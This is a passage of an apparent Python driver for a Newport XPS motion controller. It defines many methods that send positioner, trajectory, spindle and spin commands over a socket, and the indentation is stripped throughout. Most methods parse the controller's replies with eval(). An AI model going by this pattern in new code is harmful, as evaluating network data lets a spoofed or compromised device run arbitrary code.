retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerErrorGet : Read and clear positioner error code
def PositionerErrorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorRead : Read only positioner error code without clear it
def PositionerErrorRead (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorRead(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorStringGet : Return the positioner status string corresponding to the positioner error code
def PositionerErrorStringGet (self, socketId, PositionerErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorStringGet(' + str(PositionerErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExcitationSignalGet : Read disturbing signal parameters
def PositionerExcitationSignalGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalGet(' + PositionerName + ',int *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerExcitationSignalSet : Update disturbing signal parameters
def PositionerExcitationSignalSet (self, socketId, PositionerName, Mode, Frequency, Amplitude, Time):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalSet(' + PositionerName + ',' + str(Mode) + ',' + str(Frequency) + ',' + str(Amplitude) + ',' + str(Time) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExternalLatchPositionGet : Read external latch position
def PositionerExternalLatchPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExternalLatchPositionGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusGet : Read positioner hardware status
def PositionerHardwareStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusStringGet : Return the positioner hardware status string corresponding to the positioner error code
def PositionerHardwareStatusStringGet (self, socketId, PositionerHardwareStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusStringGet(' + str(PositionerHardwareStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardInterpolatorFactorGet : Get hard interpolator parameters
def PositionerHardInterpolatorFactorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardInterpolatorFactorSet : Set hard interpolator parameters
def PositionerHardInterpolatorFactorSet (self, socketId, PositionerName, InterpolationFactor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorSet(' + PositionerName + ',' + str(InterpolationFactor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerMaximumVelocityAndAccelerationGet : Return maximum velocity and acceleration of the positioner
def PositionerMaximumVelocityAndAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMaximumVelocityAndAccelerationGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneGet : Read motion done parameters
def PositionerMotionDoneGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneSet : Update motion done parameters
def PositionerMotionDoneSet (self, socketId, PositionerName, PositionWindow, VelocityWindow, CheckingTime, MeanPeriod, TimeOut):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneSet(' + PositionerName + ',' + str(PositionWindow) + ',' + str(VelocityWindow) + ',' + str(CheckingTime) + ',' + str(MeanPeriod) + ',' + str(TimeOut) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBAlwaysEnable : Enable AquadB signal in always mode
def PositionerPositionCompareAquadBAlwaysEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBAlwaysEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBWindowedGet : Read position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedGet(' + PositionerName + ',double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareAquadBWindowedSet : Set position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareGet : Read position compare parameters
def PositionerPositionCompareGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareSet : Set position compare parameters
def PositionerPositionCompareSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, PositionStep):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(PositionStep) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareEnable : Enable position compare
def PositionerPositionCompareEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareDisable : Disable position compare
def PositionerPositionCompareDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionComparePulseParametersGet : Get position compare PCO pulse parameters
def PositionerPositionComparePulseParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionComparePulseParametersSet : Set position compare PCO pulse parameters
def PositionerPositionComparePulseParametersSet (self, socketId, PositionerName, PCOPulseWidth, EncoderSettlingTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersSet(' + PositionerName + ',' + str(PCOPulseWidth) + ',' + str(EncoderSettlingTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerRawEncoderPositionGet : Get the raw encoder position
def PositionerRawEncoderPositionGet (self, socketId, PositionerName, UserEncoderPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerRawEncoderPositionGet(' + PositionerName + ',' + str(UserEncoderPosition) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionersEncoderIndexDifferenceGet : Return the difference between index of primary axis and secondary axis (only after homesearch)
def PositionersEncoderIndexDifferenceGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionersEncoderIndexDifferenceGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaExactVelocityAjustedDisplacementGet : Return adjusted displacement to get exact velocity
def PositionerSGammaExactVelocityAjustedDisplacementGet (self, socketId, PositionerName, DesiredDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaExactVelocityAjustedDisplacementGet(' + PositionerName + ',' + str(DesiredDisplacement) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaParametersGet : Read dynamic parameters for one axe of a group for a future displacement
def PositionerSGammaParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerSGammaParametersSet : Update dynamic parameters for one axe of a group for a future displacement
def PositionerSGammaParametersSet (self, socketId, PositionerName, Velocity, Acceleration, MinimumTjerkTime, MaximumTjerkTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersSet(' + PositionerName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(MinimumTjerkTime) + ',' + str(MaximumTjerkTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerSGammaPreviousMotionTimesGet : Read SettingTime and SettlingTime
def PositionerSGammaPreviousMotionTimesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaPreviousMotionTimesGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerStageParameterGet : Return the stage parameter
def PositionerStageParameterGet (self, socketId, PositionerName, ParameterName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterGet(' + PositionerName + ',' + ParameterName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerStageParameterSet : Save the stage parameter
def PositionerStageParameterSet (self, socketId, PositionerName, ParameterName, ParameterValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterSet(' + PositionerName + ',' + ParameterName + ',' + ParameterValue + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherGet : Read time flasher parameters
def PositionerTimeFlasherGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerTimeFlasherSet : Set time flasher parameters
def PositionerTimeFlasherSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherEnable : Enable time flasher
def PositionerTimeFlasherEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherDisable : Disable time flasher
def PositionerTimeFlasherDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerUserTravelLimitsGet : Read UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerUserTravelLimitsSet : Update UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsSet (self, socketId, PositionerName, UserMinimumTarget, UserMaximumTarget):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsSet(' + PositionerName + ',' + str(UserMinimumTarget) + ',' + str(UserMaximumTarget) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetGet : Get DAC offsets
def PositionerDACOffsetGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetGet(' + PositionerName + ',short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetSet : Set DAC offsets
def PositionerDACOffsetSet (self, socketId, PositionerName, DACOffset1, DACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetSet(' + PositionerName + ',' + str(DACOffset1) + ',' + str(DACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetDualGet : Get dual DAC offsets
def PositionerDACOffsetDualGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualGet(' + PositionerName + ',short *,short *,short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetDualSet : Set dual DAC offsets
def PositionerDACOffsetDualSet (self, socketId, PositionerName, PrimaryDACOffset1, PrimaryDACOffset2, SecondaryDACOffset1, SecondaryDACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualSet(' + PositionerName + ',' + str(PrimaryDACOffset1) + ',' + str(PrimaryDACOffset2) + ',' + str(SecondaryDACOffset1) + ',' + str(SecondaryDACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorAutoTuning : Astrom&Hagglund based auto-tuning
def PositionerCorrectorAutoTuning (self, socketId, PositionerName, TuningMode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorAutoTuning(' + PositionerName + ',' + str(TuningMode) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAccelerationAutoScaling : Astrom&Hagglund based auto-scaling
def PositionerAccelerationAutoScaling (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAccelerationAutoScaling(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTVerification : Multiple axes PVT trajectory verification
def MultipleAxesPVTVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTVerificationResultGet : Multiple axes PVT trajectory verification result get
def MultipleAxesPVTVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# MultipleAxesPVTExecution : Multiple axes PVT trajectory execution
def MultipleAxesPVTExecution (self, socketId, GroupName, TrajectoryFileName, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTParametersGet : Multiple axes PVT trajectory get parameters
def MultipleAxesPVTParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTParametersGet(' + GroupName + ',char *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTPulseOutputSet : Configure pulse output on trajectory
def MultipleAxesPVTPulseOutputSet (self, socketId, GroupName, StartElement, EndElement, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputSet(' + GroupName + ',' + str(StartElement) + ',' + str(EndElement) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTPulseOutputGet : Get pulse output on trajectory configuration
def MultipleAxesPVTPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputGet(' + GroupName + ',int *,int *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# SingleAxisSlaveModeEnable : Enable the slave mode
def SingleAxisSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveModeDisable : Disable the slave mode
def SingleAxisSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersSet : Set slave parameters
def SingleAxisSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersGet : Get slave parameters
def SingleAxisSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# SpindleSlaveModeEnable : Enable the slave mode
def SpindleSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveModeDisable : Disable the slave mode
def SpindleSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersSet : Set slave parameters
def SpindleSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersGet : Get slave parameters
def SpindleSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupSpinParametersSet : Modify Spin parameters on selected group and activate the continuous move
def GroupSpinParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersSet(' + GroupName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupSpinParametersGet : Get Spin parameters on selected group
def GroupSpinParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinCurrentGet : Get Spin current on selected group
def GroupSpinCurrentGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinCurrentGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinModeStop : Stop Spin mode on selected group with specified acceleration
def GroupSpinModeStop (self, socketId, GroupName, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinModeStop(' + GroupName + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerification : XY trajectory verification
def XYLineArcVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerificationResultGet : XY trajectory verification result get
def XYLineArcVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcExecution : XY trajectory execution
def XYLineArcExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcParametersGet : XY trajectory get parameters
def XYLineArcParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcPulseOutputSet : Configure pulse output on trajectory
def XYLineArcPulseOutputSet (self, socketId, GroupName, StartLength, EndLength, PathLengthInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputSet(' + GroupName + ',' + str(StartLength) + ',' + str(EndLength) + ',' + str(PathLengthInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcPulseOutputGet : Get pulse output on trajectory configuration
def XYLineArcPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputGet(' + GroupName + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZGroupPositionCorrectedProfilerGet : Return corrected profiler positions
def XYZGroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY, PositionZ):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZGroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',' + str(PositionZ) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
